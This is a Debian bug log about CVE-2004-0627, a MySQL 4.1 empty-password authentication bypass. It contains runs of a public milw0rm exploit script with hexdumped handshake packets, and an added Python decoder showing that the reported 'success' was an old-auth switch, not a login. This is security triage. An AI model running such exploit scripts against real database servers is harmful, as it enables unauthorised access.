Debian Bug report logs - #380507
CVE-2004-0627 check_scramble_323() zero-length password auth bypass
Reported by: patrick.matthaei@web.de
Date: Sun, 30 Jul 2006 16:48:20 UTC
Severity: important
Tags: moreinfo, security, unreproducible
Found in version 4.1.11a-4sarge
Done: Christian Hammers <ch@debian.org>
Bug is archived. No further changes may be made.
Report forwarded to debian-bugs-dist@lists.debian.org, Christian Hammers <ch@debian.org>:
Bug#380507; Package mysql-server-4.1.
Acknowledgement sent to patrick.matthaei@web.de:
New Bug report received and forwarded. Copy sent to Christian Hammers <ch@debian.org>.
Message #5 received at submit@bugs.debian.org:
Package: mysql-server-4.1
Version: 4.1.11a-4sarge
Severity: important
Tags: security
http://www.milw0rm.com/exploits/311
With this exploit it's possible to authenticate with the mysql server
without any password.
Log:
me@the-me:~$ ./mysql.pl perl *********
Using default MySQL port (3306)
Received greeting:
00000000 47 00 00 00 0A 34 2E 31 2E 31 31 2D 44 65 62 69
00000010 61 6E 5F 34 73 61 72 67 65 35 2D 6C 6F 67 00 C6
00000020 32 00 00 6F 7C 40 6B 79 3F 6E 2D 00 2C A2 08 02
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 54
00000040 2F 2E 39 73 58 3F 71 3F 25 37 00
Sending caps packet:
00000000 3A 00 00 01 85 A6 03 00 00 00 00 01 08 00 00 00
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000020 00 00 00 00 70 65 72 6C 00 14 00 00 00 00 00 00
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Received reply:
00000000 01 00 00 02 FE
Received OK reply, authentication successful!!
me@the-me:~$
It's an old exploit but the sarge version is still exploitable.
Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#380507; Package mysql-server-4.1.
Acknowledgement sent to Christian Hammers <ch@debian.org>:
Extra info received and forwarded to list.
Message #10 received at 380507@bugs.debian.org:
tags 380507 + unreproducible moreinfo
stop
Hello Patrick
On 2006-07-30 Patrick Matthäi wrote:
> http://www.milw0rm.com/exploits/311
> With this exploit it's able to authenticate with the mysql server
> without any password.
I cannot reproduce this behaviour. Which version do you use, this?
# dpkg -s mysql-server-4.1 | grep Version
Version: 4.1.11a-4sarge5
> Log:
> me@the-me:~$ ./mysql.pl perl *********
Did you use more than your IP or your hostname as "***"?
> It's an old exploit but the sargeversion is still exploitable.
It should have been fixed in 4.1.3 long before the Sarge release.
I get:
$ ./milw0rm311.pl root app109
Using default MySQL port (3306)
Received greeting:
00000000 47 00 00 00 0A 34 2E 31 2E 31 31 2D 44 65 62 69
00000010 61 6E 5F 34 73 61 72 67 65 35 2D 6C 6F 67 00 0D
00000020 00 00 00 6C 56 4A 51 36 58 3B 5E 00 2C A2 08 02
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 23
00000040 79 5A 39 4B 4E 27 76 3F 73 48 00
Sending caps packet:
00000000 3A 00 00 01 85 A6 03 00 00 00 00 01 08 00 00 00
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000020 00 00 00 00 72 6F 6F 74 00 14 00 00 00 00 00 00
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Received reply:
00000000 45 00 00 02 FF 15 04 23 32 38 30 30 30 41 63 63
00000010 65 73 73 20 64 65 6E 69 65 64 20 66 6F 72 20 75
00000020 73 65 72 20 27 72 6F 6F 74 27 40 27 61 70 70 31
00000030 30 39 27 20 28 75 73 69 6E 67 20 70 61 73 73 77
00000040 6F 72 64 3A 20 59 45 53 29
Authentication failed!
bye,
-christian-
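The two logs above (the submitter's in message #5 and the maintainer's in message #10) print the raw MySQL 4.1 handshake as hexdumps. The following decoder is an added illustration, not part of the bug report or of the milw0rm script; it assumes the standard MySQL packet framing (3-byte little-endian payload length, 1-byte sequence id) and the protocol-10 greeting and reply layouts, and it decodes exactly the packets captured in this thread:

```python
# Packets copied from the two logs in this bug report, in the script's hexdump format.
GREETING = """
00000000 47 00 00 00 0A 34 2E 31 2E 31 31 2D 44 65 62 69
00000010 61 6E 5F 34 73 61 72 67 65 35 2D 6C 6F 67 00 C6
00000020 32 00 00 6F 7C 40 6B 79 3F 6E 2D 00 2C A2 08 02
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 54
00000040 2F 2E 39 73 58 3F 71 3F 25 37 00
"""
REPLY_SARGE = "00000000 01 00 00 02 FE"   # reply shown in the submitter's log
REPLY_SARGE5 = """
00000000 45 00 00 02 FF 15 04 23 32 38 30 30 30 41 63 63
00000010 65 73 73 20 64 65 6E 69 65 64 20 66 6F 72 20 75
00000020 73 65 72 20 27 72 6F 6F 74 27 40 27 61 70 70 31
00000030 30 39 27 20 28 75 73 69 6E 67 20 70 61 73 73 77
00000040 6F 72 64 3A 20 59 45 53 29
"""                                        # reply shown in the maintainer's log

def hexdump_to_bytes(dump):
    """Join the hex columns of each 'offset hh hh ...' line into raw bytes."""
    return b"".join(bytes.fromhex("".join(line.split()[1:]))
                    for line in dump.strip().splitlines())

def split_packet(raw):
    """MySQL framing: 3-byte little-endian payload length, 1-byte sequence id, payload."""
    length = int.from_bytes(raw[:3], "little")
    if len(raw) - 4 != length:
        raise ValueError("declared %d payload bytes, got %d" % (length, len(raw) - 4))
    return raw[3], raw[4:]

def server_version(payload):
    """Protocol-10 greeting: byte 0x0A, then the NUL-terminated version banner."""
    if payload[0] != 0x0A:
        raise ValueError("not a protocol-10 greeting")
    return payload[1:payload.index(b"\x00", 1)].decode()

def classify_auth_reply(payload):
    """First byte gives the outcome: 0x00 OK, 0xFF ERR (error code, '#sqlstate',
    message).  A packet that is only 0xFE is the server asking the client to
    re-send the password with the old 3.23 scramble; it is not a successful login."""
    if payload[0] == 0x00:
        return {"kind": "OK"}
    if payload[0] == 0xFF:
        return {"kind": "ERR", "code": int.from_bytes(payload[1:3], "little"),
                "sqlstate": payload[4:9].decode(), "message": payload[9:].decode()}
    if payload == b"\xfe":
        return {"kind": "OLD_AUTH_SWITCH"}
    return {"kind": "UNKNOWN"}
```

Running `classify_auth_reply` over the two captured replies separates the 1045 "Access denied" error in the maintainer's log from the single-byte 0xFE packet in the submitter's log, and `server_version` recovers the banner "4.1.11-Debian_4sarge5-log" that both greetings carry.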
Tags added: unreproducible, moreinfo
Request was from Christian Hammers <ch@debian.org>
to control@bugs.debian.org.
Changed Bug title.
Request was from Christian Hammers <ch@debian.org>
to control@bugs.debian.org.
Reply sent to Christian Hammers <ch@debian.org>:
You have taken responsibility.
Notification sent to patrick.matthaei@web.de:
Bug acknowledged by developer.
Message #19 received at 380507-done@bugs.debian.org:
retitle 380507 CVE-2004-0627 check_scramble_323() zero-length password auth bypass
stop
Hello
The www.milw0rm.com/exploits/311 script utilizes the CVE-2004-0627
vulnerability.
MySQL-3.23 and 4.0 were not affected as they did not contain "new style"
passwords and thus no check_scramble_323. 4.1 and 5.0 have a high
enough version.
bye,
-christian-
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sun, 17 Jun 2007 12:22:18 GMT)
Bug unarchived.
Request was from Stefano Zacchiroli <zack@debian.org>
to control@bugs.debian.org.
(Sun, 10 Apr 2011 08:48:21 GMT)
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Mon, 09 May 2011 07:32:34 GMT)
Last modified: Wed Oct 11 12:06:40 2017